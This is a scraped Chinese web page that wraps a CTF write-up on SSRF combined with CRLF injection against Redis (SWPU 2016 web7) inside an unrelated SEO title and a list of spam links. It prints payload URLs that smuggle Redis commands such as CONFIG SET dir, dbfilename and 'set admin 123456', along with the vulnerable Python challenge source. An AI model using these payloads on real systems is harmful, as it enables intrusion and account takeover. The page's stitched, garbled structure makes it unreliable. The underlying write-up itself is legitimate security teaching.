当前位置: 首页 > news >正文

安能物流网站wordpress打折插件

news 2026/4/19 7:30:32
安能物流网站,wordpress打折插件,网络组建与应用实训报告,广告发布是什么意思文章目录 注入原理例题 [SWPU 2016]web7 注入原理 参考文章 应用场景是具有SSRF漏洞#xff0c;结合CRLF注入 我们以redis数据库为例#xff0c;当存在SSRF时我们伪造以下请求 http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%… 文章目录 注入原理例题 [SWPU 2016]web7 注入原理 参考文章 应用场景是具有SSRF漏洞结合CRLF注入 我们以redis数据库为例当存在SSRF时我们伪造以下请求 http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0a:6379/foo解码一下执行过程就是将修改Redis的工作目录为 /tmp然后修改Redis的数据库文件名为 evil路径为默认端口的/foo http://127.0.0.1 CONFIG SET dir /tmp CONFIG SET dbfilename evil :6379/foo然后就可以执行相关操作比如修改用户的密码 再次利用ssrf漏洞进行修改并保存 http://127.0.0.1%0d%0aset%20admin%20admin%0d%0asave%0d%0a:6379/foo解码结果如下 http://127.0.0.1 set admin 123456 save :6379/foo例题 [SWPU 2016]web7 源码 #!/usr/bin/python # coding:utf8__author__ niexinmingimport cherrypy import urllib2 import redisclass web7:cherrypy.exposedef index(self):return script window.location.href/input;/scriptcherrypy.exposedef input(self,url,submit):fileopen(index.html,r).read()reheadersif cherrypy.request.methodGET:reheaderselse:urlcherrypy.request.params[url]submitcherrypy.request.params[submit]try:for x in urllib2.urlopen(url).info().headers:reheadersreheadersxbrexcept Exception,e:reheaders错误str(e)for x in urllib2.urlopen(url).info().headers:reheadersreheadersxbrfilefile.replace(?response?,reheaders)return filecherrypy.exposedef login(self,password,submit):pool redis.ConnectionPool(host127.0.0.1, port6379)r redis.Redis(connection_poolpool)refileopen(login.html,r).read()if cherrypy.request.methodGET:reelse:passwordcherrypy.request.params[password]submitcherrypy.request.params[submit]if r.get(admin)password:reopen(flag,r).readline()else:reCant find admin:password,fast fast fast.....filefile.replace(?response?,re)return file cherrypy.config.update({server.socket_host: 0.0.0.0,server.socket_port: 8080,}) cherrypy.quickstart(web7(),/)可以看到引入urllib2模块题目逻辑比较清晰就是要登录admin才能获取flagadmin的密码就在redis数据库中然后input中使用了urllib2.open().info().headers应该是可以利用SSRF来注入redis修改admin的密码的。 我们直接修改密码redis默认端口为6379 http://127.0.0.1%0d%0aset%20admin%20123456%0d%0a:6379//解码如下 http://127.0.0.1 set admin 123456 :6379
http://www.hkea.cn/news/14325013/

相关文章:

  • 免费做app网站有哪些90设计网站会员全站通与电商模板的区别
  • 自己做的网站能被百度收录吗做网站与网店运营
  • 网站建设哪家公司好成都网站建设网站设计论坛
  • 重庆做兼职哪个网站网页版梦幻西游礼品码
  • 网站开发培训训高端开发网站哪家专业
  • 网站开发程序员的工资是多少建设境外网站需要什么手续
  • 长沙模板网站建设高端网站建设文案
  • 网站做301跳转的方法站长工具的使用seo综合查询运营
  • ytwzjs烟台网站建设分类信息网站成都搭建
  • 个人注册公司查询搜索 引擎优化
  • 正规网站建设空间徐州建设工程交易网站质量监督
  • 模板网站的域名是什么意思手机实用网站
  • 深圳网站优化哪家好wordpress isadmin
  • 凌晨网站建设公司英文淘宝网站建设
  • 如何避免网站被降权做宠物店网站
  • 网站建设督查报告品牌推广和市场推广的区别
  • 常德交通网站西南交通建设集团股份有限公司网站
  • 在网站上做宣传上海徐汇做网站
  • 展示型网站 数据库黑龙江恒泰建设集团网站
  • 什么网站不能备案移动端网站制作的有哪些要求
  • 海外酒店网站建设黔西南北京网站建设
  • 广州服装网站建设惠州做网站公司哪家好
  • 跨境电商在哪些网站上面做国外域名注册价格
  • 东莞公司网站做优化微信开发公司是哪个
  • 道滘镇仿做网站简历模板表格
  • 合肥网站建设设计外包自己怎么做网站的聚合页面
  • 查询网站个人主页在哪里
  • 品牌网站建设小7a蝌蚪网站改版需要注意什么
  • 电子商务网站设计思路瑞安网站建设优化
  • 安卓原生app开发工具seo顾问和seo专员